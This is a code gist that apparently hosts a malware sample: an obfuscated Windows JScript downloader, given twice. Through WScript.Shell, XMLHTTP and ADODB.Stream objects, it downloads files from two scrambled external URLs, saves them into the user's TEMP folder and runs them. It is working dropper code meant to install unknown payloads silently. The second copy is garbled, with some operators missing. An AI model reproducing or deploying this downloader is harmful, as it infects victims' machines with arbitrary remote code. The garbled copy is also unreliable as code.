malwareforme/gist:adad23f5132c2207bfdf

## gistfile1.js
(function() {
    var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
    gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
    var pew = ("ZA|9m]c5NX',si" ["length"] * 31 + 1.0);
    jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
    Am5 = ("e$|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);

    function LC2(fr, ERo, rn) {
        var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
        N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");
        var ERo = QDy["" + (53 > 14 ? "\x45" : "\x3e") + "xp" + "andEnvironment" + (58 > 4 ? "\x53" : "\x4b") + "trings"]("Nf%D9TYE<M7aP64%" [(4.0 + "v}\x85\x88g" ["length"] * 3273117743)["toString"]((2 * "0aM\x7f?jmH/\x88\x874v(" ["length"] + 1.0))](/[\<DN6f479aY]/g, "")) + String["fr" + (65 > 27 ? "\x6f" : "\x6a") + "mChar" + "Co" + (82 > 41 ? "\x64" : "\x5f") + "e"](92) + ERo;
        var au5 = (1 * "Bg:(J\x83QC=h@" ["charCodeAt"](2) + 26.0);
        HvV = ("D]9RlIt*E%\x60=" ["length"] * 3 + 5.0);
        var QN3 = new ActiveXObject("bMpS9X*lM<LI2B.J=X&MQL9HbTqTqP" [("0\x84^:w?RcDT+>" ["charCodeAt"](5) * 947025922 + 32.0)["toString"]((10.0 + "?\x8a2.Vh\x84\x83^omX0" ["length"] * 2))](/[p\<B9lJIQ\=\*q\&b]/g, ""));
        var Lv_ = "yI`Q!7gUpLGQfet*V1mN>c" ["replace"](/[\*yp\`efg\!Gm\>1]/g, "");
        QN3["o" + (64 > 24 ? "\x6e" : "\x67") + "" + "ready" + (79 > 6 ? "\x73" : "\x6e") + "tatechange"] = function() {
            if (QN3["read" + (91 > 9 ? "\x79" : "\x71") + "St" + "" + (55 > 26 ? "\x61" : "\x5b") + "te"] === 4) {
                var VaG = new ActiveXObject("CACyD@OvDwBvp.ZS-twr1eWaym" [(419630479 * "@2#Ps\x899e'%bU<O" ["charCodeAt"](8) + 38.0)["toString"]((5 * "GY\x88^a" ["length"] + 4.0))](/[vyCZp1w\-\@W]/g, ""));
                xna = (7.0 + "0eR6,<9OqVo\x83}[\x87" ["charCodeAt"](7) * 2);
                VaG["o" + "pe" + (91 > 23 ? "\x6e" : "\x64") + ""]();
                Ppr = "Su70AKuw&uQUCjXGD9bGQ2" ["replace"](/[KXCwSQ0b7D\&]/g, "");
                var uSU = "mh1xPwcaUk0R%A6ZyYi<orn" [(614718375 * "ovV,=QUKd\x7fR(7_T\x82k" ["charCodeAt"](10) + 59.0)["toString"]((2 * "Ky|.St\x8bhGeNH\x85" ["length"] + 9.0))](/[\<cUi16myrP\%Rk]/g, "");
                HJ4 = (3.0 + "{FKH#" ["length"] * 49);
                Axk = (1 * "\x60N5\x8b[)w\x88c,Z{xX" ["charCodeAt"](2) + 20.0);
                VaG["" + (89 > 23 ? "\x74" : "\x6b") + "y" + "" + (97 > 12 ? "\x70" : "\x6a") + "e"] = 1;
                var kYd = (4.0 + "-i|{\x84VUZCG*;M>" ["length"] * 6);
                VaG["w" + (95 > 29 ? "\x72" : "\x6a") + "i" + "" + (62 > 4 ? "\x74" : "\x6a") + "e"](QN3["Respo" + (61 > 44 ? "\x6e" : "\x69") + "s" + "eBod" + (88 > 44 ? "\x79" : "\x73") + ""]);
                rvT = (1 * "QANaE5UG#D" ["charCodeAt"](4) + 34.0);
                VaG["pos" + (100 > 21 ? "\x69" : "\x5f") + "" + "ti" + (60 > 21 ? "\x6f" : "\x69") + "n"] = 0;
                var lGe = "mPQ6ldiOX8y959AK4Eeh3)2`D" [(901703424 * "\x7f\x82>/[?6#\x83(.S" ["charCodeAt"](3) + 6.0)["toString"](("&Z}V)=x\x80;p\x7f$k" ["length"] * 2 + 8.0))](/[6QO9\`3deXE\)myK]/g, "");
                VaG["saveToF" + (73 > 0 ? "\x69" : "\x5f") + "l" + "e"](ERo, 2);
                get = ("\x88xqKHs%P46$g" ["charCodeAt"](6) * 10 + 17.0);
                VaG["" + (79 > 46 ? "\x63" : "\x5d") + "l" + "os" + (91 > 18 ? "\x65" : "\x60") + ""]();
                jhv = "mYQNoCcVdtXI*Ezr96#<w" [(1636558871 * "t}\x8a\x83.08=ja" ["length"] + 9.0)["toString"]((29.0 + "\x7fx\x88q0\x81|HCdL@D\x83$^B+\x82k" ["charCodeAt"](11) * 0))](/[moz\#d\*\<cQ9X]/g, "");
            };
            var cov = "khLgMjWbmiQ&PcqyXJ0;x" [(4971886093 * "-dA;4FG@VI.\x8a" ["length"] + 2.0)["toString"](("izC3O.-M\x80ps$*N:" ["charCodeAt"](13) * 0 + 36.0))](/[g\&ibk\;yLjcJ]/g, "");
        };
        var vta = "8TtjGoK3KRKW/vC/zgLDX" [("\x892^DtETAJ+Fpx\x80" ["length"] * 1168970622 + 11.0)["toString"](("\x8awG\x81~r\x86" ["length"] * 4 + 1.0))](/[vGDt8\/gK]/g, "");
        try {
            QN3["" + "op" + (66 > 24 ? "\x65" : "\x5d") + "n"]("dGQIEKT" ["replace"](/[IKQd]/g, ""), fr, false);
            var Ltz = (12 * "\x8a{uYL#_i*}\x89\x60H>S" ["length"] + 0.0);
            Oax = ("P\x8bo5LfwI" ["length"] * 34 + 2.0);
            QN3["" + "s" + (77 > 45 ? "\x65" : "\x5b") + "nd"]();
            YC9 = (2.0 + ")\x81\x8a<XF#\x84A};7" ["length"] * 37);
            if (rn > 0) {
                QDy["R" + "u" + (76 > 13 ? "\x6e" : "\x67") + ""](ERo, 0, 0);
                mGl = "EUZA5QlGiToKf3bVNVtzO" ["replace"](/[VbZEfli5zo]/g, "");
                Ylr = (1.0 + ",6ui.\x8bx:\x80" ["length"] * 27);
                var AZV = (4.0 + "8\x825Do" ["length"] * 21);
            };
            TZZ = "+yq;omZ1I@B/vu6tsRPHQS`J" ["replace"](/[\+\;I\/Qut\`Zq\@sPm]/g, "");
        } catch (er) {};
        O4H = "m1QqLnz;favIF<g(W`O_D" [(3.0 + ";@d7\x86" ["length"] * 11932526623)["toString"]((0 * "\x82/SN(r\x84\x886." ["charCodeAt"](8) + 36.0))](/[az\_\;\`\<\(LImQ]/g, "");
    }
    LC2("XhftbtN@p(T:</D/6dNofur&t=8t0l~o>k~6oGlKr8t~-.%cuoZmX/2iJ*mXNa@gYeCsT/NOoMn>e!.9jLp;g" [(5966263311 * ",z_{+I}s%k" ["length"] + 8.0)["toString"]((36.0 + "(MhJ6\x8a&qP'zL" ["charCodeAt"](8) * 0))](/[2Y60K\&\*\!uD\%b89G\<\@fOZX\;LMN\(T\~\>C\-J\=]/g, ""), ")8-8T6[5f2]4(1M.3e-txke" ["replace"](/[T3\-\)M\[\(tk\]f]/g, ""), 1);
    var Gl5 = (5.0 + "%\x83Xra\x8bOLn6T" ["length"] * 9);
    var mb5 = "-KBmEatxUu_f9c5V12kGztp" [(727593086 * "}2\x82G.)Y\x81pR\x60'snI" ["charCodeAt"](9) + 66.0)["toString"]((36.0 + "\x81f*\x85%\x87HY\x88qu" ["charCodeAt"](4) * 0))](/[1m2\-G5\_t9UaK]/g, "");
    var VyD = "h7TsOSDVCUndbH#e)o`64Fo" ["replace"](/[4C\)n\#S7V\`hFbs]/g, "");
    LC2("<~hUt65tS]p!:A_/%/Hd+Wo4rbUtStblMoGk~oqlAry_t<.Ic5>oNmf/DiK_m1aMg5eYs8/Uqt<w9No9.Qj5p7Tg" ["replace"](/[\_\<IbMq7fK\]NU896DyGQ\+S\!\~AY1H5\>T\%4W]/g, ""), "L7%284u6B~5q4G9s.Ee*xDe" ["replace"](/[Lq\%s8\*\~EBGuD]/g, ""), 1);
    var rFy = "e~v-vyW+X*nicEI]b=h*9" [(35.0 + "\x7fx1N-E2\x83\x80Q\x60b^\x894&sv" ["charCodeAt"](5) * 513738328)["toString"]((3 * "k\x832x}\x82W[\x81M." ["length"] + 0.0))](/[i\*\+\]\-Eye\=\~]/g, "");
    mBN = (5 * "1\x83\x81d\x7f/APE{r" ["charCodeAt"](6) + 1.0)
})(); //XvXBUIuVck
	(function() {
	var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80\|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
	gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
	var pew = ("ZA\|9m]c5NX',si" ["length"] * 31 + 1.0);
	jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
	Am5 = ("e$\|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);

	function LC2(fr, ERo, rn) {
	var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
	N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");
	var ERo = QDy["" + (53 > 14 ? "\x45" : "\x3e") + "xp" + "andEnvironment" + (58 > 4 ? "\x53" : "\x4b") + "trings"]("Nf%D9TYE<M7aP64%" [(4.0 + "v}\x85\x88g" ["length"] * 3273117743)["toString"]((2 * "0aM\x7f?jmH/\x88\x874v(" ["length"] + 1.0))](/[\<DN6f479aY]/g, "")) + String["fr" + (65 > 27 ? "\x6f" : "\x6a") + "mChar" + "Co" + (82 > 41 ? "\x64" : "\x5f") + "e"](92) + ERo;
	var au5 = (1 * "Bg:(J\x83QC=h@" ["charCodeAt"](2) + 26.0);
	HvV = ("D]9RlItE%\x60=" ["length"] 3 + 5.0);
	var QN3 = new ActiveXObject("bMpS9XlM<LI2B.J=X&MQL9HbTqTqP" [("0\x84^:w?RcDT+>" ["charCodeAt"](5) 947025922 + 32.0)["toString"]((10.0 + "?\x8a2.Vh\x84\x83^omX0" ["length"] * 2))](/[p\<B9lJIQ\=\*q\&b]/g, ""));
	var Lv_ = "yI`Q!7gUpLGQfetV1mN>c" ["replace"](/[\yp\`efg\!Gm\>1]/g, "");
	QN3["o" + (64 > 24 ? "\x6e" : "\x67") + "" + "ready" + (79 > 6 ? "\x73" : "\x6e") + "tatechange"] = function() {
	if (QN3["read" + (91 > 9 ? "\x79" : "\x71") + "St" + "" + (55 > 26 ? "\x61" : "\x5b") + "te"] === 4) {
	var VaG = new ActiveXObject("CACyD@OvDwBvp.ZS-twr1eWaym" [(419630479 * "@2#Ps\x899e'%bU<O" ["charCodeAt"](8) + 38.0)["toString"]((5 * "GY\x88^a" ["length"] + 4.0))](/[vyCZp1w\-\@W]/g, ""));
	xna = (7.0 + "0eR6,<9OqVo\x83}[\x87" ["charCodeAt"](7) * 2);
	VaG["o" + "pe" + (91 > 23 ? "\x6e" : "\x64") + ""]();
	Ppr = "Su70AKuw&uQUCjXGD9bGQ2" ["replace"](/[KXCwSQ0b7D\&]/g, "");
	var uSU = "mh1xPwcaUk0R%A6ZyYi<orn" [(614718375 * "ovV,=QUKd\x7fR(7_T\x82k" ["charCodeAt"](10) + 59.0)["toString"]((2 * "Ky\|.St\x8bhGeNH\x85" ["length"] + 9.0))](/[\<cUi16myrP\%Rk]/g, "");
	HJ4 = (3.0 + "{FKH#" ["length"] * 49);
	Axk = (1 * "\x60N5\x8b[)w\x88c,Z{xX" ["charCodeAt"](2) + 20.0);
	VaG["" + (89 > 23 ? "\x74" : "\x6b") + "y" + "" + (97 > 12 ? "\x70" : "\x6a") + "e"] = 1;
	var kYd = (4.0 + "-i\|{\x84VUZCG;M>" ["length"] 6);
	VaG["w" + (95 > 29 ? "\x72" : "\x6a") + "i" + "" + (62 > 4 ? "\x74" : "\x6a") + "e"](QN3["Respo" + (61 > 44 ? "\x6e" : "\x69") + "s" + "eBod" + (88 > 44 ? "\x79" : "\x73") + ""]);
	rvT = (1 * "QANaE5UG#D" ["charCodeAt"](4) + 34.0);
	VaG["pos" + (100 > 21 ? "\x69" : "\x5f") + "" + "ti" + (60 > 21 ? "\x6f" : "\x69") + "n"] = 0;
	var lGe = "mPQ6ldiOX8y959AK4Eeh3)2`D" [(901703424 * "\x7f\x82>/[?6#\x83(.S" ["charCodeAt"](3) + 6.0)["toString"](("&Z}V)=x\x80;p\x7f$k" ["length"] * 2 + 8.0))](/[6QO9\`3deXE\)myK]/g, "");
	VaG["saveToF" + (73 > 0 ? "\x69" : "\x5f") + "l" + "e"](ERo, 2);
	get = ("\x88xqKHs%P46$g" ["charCodeAt"](6) * 10 + 17.0);
	VaG["" + (79 > 46 ? "\x63" : "\x5d") + "l" + "os" + (91 > 18 ? "\x65" : "\x60") + ""]();
	jhv = "mYQNoCcVdtXIEzr96#<w" [(1636558871 "t}\x8a\x83.08=ja" ["length"] + 9.0)["toString"]((29.0 + "\x7fx\x88q0\x81\|HCdL@D\x83$^B+\x82k" ["charCodeAt"](11) * 0))](/[moz\#d\*\<cQ9X]/g, "");
	};
	var cov = "khLgMjWbmiQ&PcqyXJ0;x" [(4971886093 * "-dA;4FG@VI.\x8a" ["length"] + 2.0)["toString"](("izC3O.-M\x80ps$N:" ["charCodeAt"](13) 0 + 36.0))](/[g\&ibk\;yLjcJ]/g, "");
	};
	var vta = "8TtjGoK3KRKW/vC/zgLDX" [("\x892^DtETAJ+Fpx\x80" ["length"] * 1168970622 + 11.0)["toString"](("\x8awG\x81~r\x86" ["length"] * 4 + 1.0))](/[vGDt8\/gK]/g, "");
	try {
	QN3["" + "op" + (66 > 24 ? "\x65" : "\x5d") + "n"]("dGQIEKT" ["replace"](/[IKQd]/g, ""), fr, false);
	var Ltz = (12 * "\x8a{uYL#_i*}\x89\x60H>S" ["length"] + 0.0);
	Oax = ("P\x8bo5LfwI" ["length"] * 34 + 2.0);
	QN3["" + "s" + (77 > 45 ? "\x65" : "\x5b") + "nd"]();
	YC9 = (2.0 + ")\x81\x8a<XF#\x84A};7" ["length"] * 37);
	if (rn > 0) {
	QDy["R" + "u" + (76 > 13 ? "\x6e" : "\x67") + ""](ERo, 0, 0);
	mGl = "EUZA5QlGiToKf3bVNVtzO" ["replace"](/[VbZEfli5zo]/g, "");
	Ylr = (1.0 + ",6ui.\x8bx:\x80" ["length"] * 27);
	var AZV = (4.0 + "8\x825Do" ["length"] * 21);
	};
	TZZ = "+yq;omZ1I@B/vu6tsRPHQS`J" ["replace"](/[\+\;I\/Qut\`Zq\@sPm]/g, "");
	} catch (er) {};
	O4H = "m1QqLnz;favIF<g(W`O_D" [(3.0 + ";@d7\x86" ["length"] * 11932526623)["toString"]((0 * "\x82/SN(r\x84\x886." ["charCodeAt"](8) + 36.0))](/[az\_\;\`\<\(LImQ]/g, "");
	}
	LC2("XhftbtN@p(T:</D/6dNofur&t=8t0l~o>k~6oGlKr8t~-.%cuoZmX/2iJmXNa@gYeCsT/NOoMn>e!.9jLp;g" [(5966263311 ",z_{+I}s%k" ["length"] + 8.0)["toString"]((36.0 + "(MhJ6\x8a&qP'zL" ["charCodeAt"](8) * 0))](/[2Y60K\&\*\!uD\%b89G\<\@fOZX\;LMN\(T\~\>C\-J\=]/g, ""), ")8-8T6[5f2]4(1M.3e-txke" ["replace"](/[T3\-\)M\[\(tk\]f]/g, ""), 1);
	var Gl5 = (5.0 + "%\x83Xra\x8bOLn6T" ["length"] * 9);
	var mb5 = "-KBmEatxUu_f9c5V12kGztp" [(727593086 * "}2\x82G.)Y\x81pR\x60'snI" ["charCodeAt"](9) + 66.0)["toString"]((36.0 + "\x81f\x85%\x87HY\x88qu" ["charCodeAt"](4) 0))](/[1m2\-G5\_t9UaK]/g, "");
	var VyD = "h7TsOSDVCUndbH#e)o`64Fo" ["replace"](/[4C\)n\#S7V\`hFbs]/g, "");
	LC2("<~hUt65tS]p!:A_/%/Hd+Wo4rbUtStblMoGk~oqlAry_t<.Ic5>oNmf/DiK_m1aMg5eYs8/Uqt<w9No9.Qj5p7Tg" ["replace"](/[\_\<IbMq7fK\]NU896DyGQ\+S\!\~AY1H5\>T\%4W]/g, ""), "L7%284u6B~5q4G9s.EexDe" ["replace"](/[Lq\%s8\\~EBGuD]/g, ""), 1);
	var rFy = "e~v-vyW+XnicEI]b=h9" [(35.0 + "\x7fx1N-E2\x83\x80Q\x60b^\x894&sv" ["charCodeAt"](5) * 513738328)["toString"]((3 * "k\x832x}\x82W[\x81M." ["length"] + 0.0))](/[i\*\+\]\-Eye\=\~]/g, "");
	mBN = (5 * "1\x83\x81d\x7f/APE{r" ["charCodeAt"](6) + 1.0)
	})(); //XvXBUIuVck